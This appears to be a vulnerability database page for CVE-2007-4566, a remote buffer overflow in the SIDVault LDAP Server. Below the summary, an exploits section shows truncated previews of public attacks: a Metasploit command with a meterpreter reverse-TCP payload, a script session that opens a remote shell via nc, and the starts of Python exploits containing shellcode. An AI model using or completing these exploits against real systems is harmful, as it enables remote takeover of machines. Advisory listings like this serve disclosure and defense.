CVE-2007-4566

Published: 28/08/2007 Updated: 15/10/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Multiple buffer overflows in the login mechanism in sidvault in Alpha Centauri Software SIDVault LDAP Server prior to 2.0f allow remote malicious users to execute arbitrary code via crafted LDAP packets, as demonstrated by a long dc entry in an LDAP bind.

Vulnerable Product

alpha centauri software sidvault ldap server

Exploits

#--attack-log-- #attacker@dz-labs:~/pentests/metasploit/framework-32/trunk$ /msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=19216812 RHOST=19216813 E #[*] Please wait while we load the module tree #[*] Handler binding to LHOST 0000 #[*] Started reverse handler #[*] Sending stage (718336 bytes) ...
#!/usr/bin/python # # $ /sidvaultpy 1921681131 # # [*] SIDVault 20e Windows Remote Buffer Overflow # [*] Written by blake # [*] Tested on Windows XP SP3 # [+] Sending payload # [+] Check port 4444 for shell # # $ nc 1921681131 4444 # Microsoft Windows XP [Version 512600] # (C) Copyright 1985-2001 Microsoft Corp # # C:\WINDOWS\system32&g ...
#!/usr/bin/python """ Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days) """ import sys import socket sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" sc += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" sc += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" sc + ...
#!/usr/bin/python import socket, sys, ldap print "[*] SidVault 20e Windows Universal Buffer Overflow Exploit (SEH)" print "[*] Original author : blake" print "[*] Seh Exploit : Skull-Hacker" print "[*] Tested on Windows XP SP3" if len(sysargv)!=2: print "[*] Usage: %s <ip>" % sysargv[0] sysexit(0) # win32_exec - EXITFUNC=seh CMD=c ...